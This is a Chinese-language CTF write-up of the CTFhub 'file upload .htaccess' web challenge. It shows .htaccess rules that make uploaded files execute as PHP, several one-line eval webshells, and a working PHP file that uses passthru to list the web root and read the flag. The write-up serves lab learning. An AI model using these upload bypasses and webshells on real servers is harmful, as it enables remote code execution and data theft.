【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

CTFhub技能树里面的题最近做了一些，但是除了之前的SQL注入之外，其他的我实在没什么兴趣整理，毕竟网上的整理出来的博主很多，之所以专门整理这个文件上传.htaccess的题目，是因为我踩坑了，本以为一道简单的题目我就这么硬生生的踩进去了，还差点没出来，浪费了不少金币啊。看别的博主都是上传.htaccess文件，上传修改后缀的一句话木马，菜刀或是蚁剑一连就getshell了，简单的不能再简单，为毛我试了N次都是不行？试了各种形式的.htaccess文件，各种报错。网上如此轻易用蚁剑连上的博主，我是不知道怎么做到的（可能是我菜逼吧，不过网上好像就一两个版本，严重怀疑是最开始的那一篇带偏一堆人） 。吐槽结束，记坑。

1、常规思路

修改.htaccess文件，上传指定后缀名的一句话，菜刀连接getshell。------ 失败

基本上就这样

我试过的.htaccess内容：
版本1
<FilesMath  ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>


版本2
AddType application/x-httpd-php .jpg


配合PHP各种一句话文件后缀.jpg，
<?php eval($_PTST['c']);?>
<?php eval($_GET['c']);?>
<?php @eval($_PTST['c']);?>
<?php @eval($_GET['c']);?>
<?php eval($_PTST["c"]);?>
<?php eval($_GET["c"]);?>
<?php @eval($_PTST["c"]);?>
<?php @eval($_GET["c"]);?>


亲测，菜刀蚁剑没有一个能正常连接，要么200ok啥都不显示或者显示一句话，连不上，要么直接404，还有500的。

这种思路就是网上最流行的思路，想看的小伙伴可以看这里
https://www.cnblogs.com/anweilx/p/12523582.html

2、PHP passthru()函数

这个方法不需要菜刀，蚁剑什么，弱爆了，直接浏览器访问就看到了flag好吗，给想出这个方法的大佬点赞。
PHP的passthru()这个函数可以直接执行外部命令，用法passthru" ls ")，同样有此功能的函数还有
exec()、system()、 shell_exec()等。

解法
这里先写一个.htaccess文件上传

<FilesMatch "sj">  //sj随便写的，后面上传的文件没有后缀，就叫sj
 SetHandler application/x-httpd-php
</FilesMatch>

然后写sj文件内容如下：

<?php 
#passthru("ls /var/www/html/"); //第一次只写这一行，用来找flag文件在哪里
passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件之后，直接读取内容
?>

上传sj文件，然后浏览器直接访问文件：
这里啥都没有，需要查看源码。（小坑小坑）
得到flag

总结：
有时候不要太依赖菜刀蚁剑之类的工具，不一定要一句话，我们还可以直接执行外部命令查看，PHP常见可以用来执行外部命令的函数有 passthru()、exec()、system()、 shell_exec()等。（不要太相信网上的解法，自己多动手尝试）

by 久违 2020.5.15 夜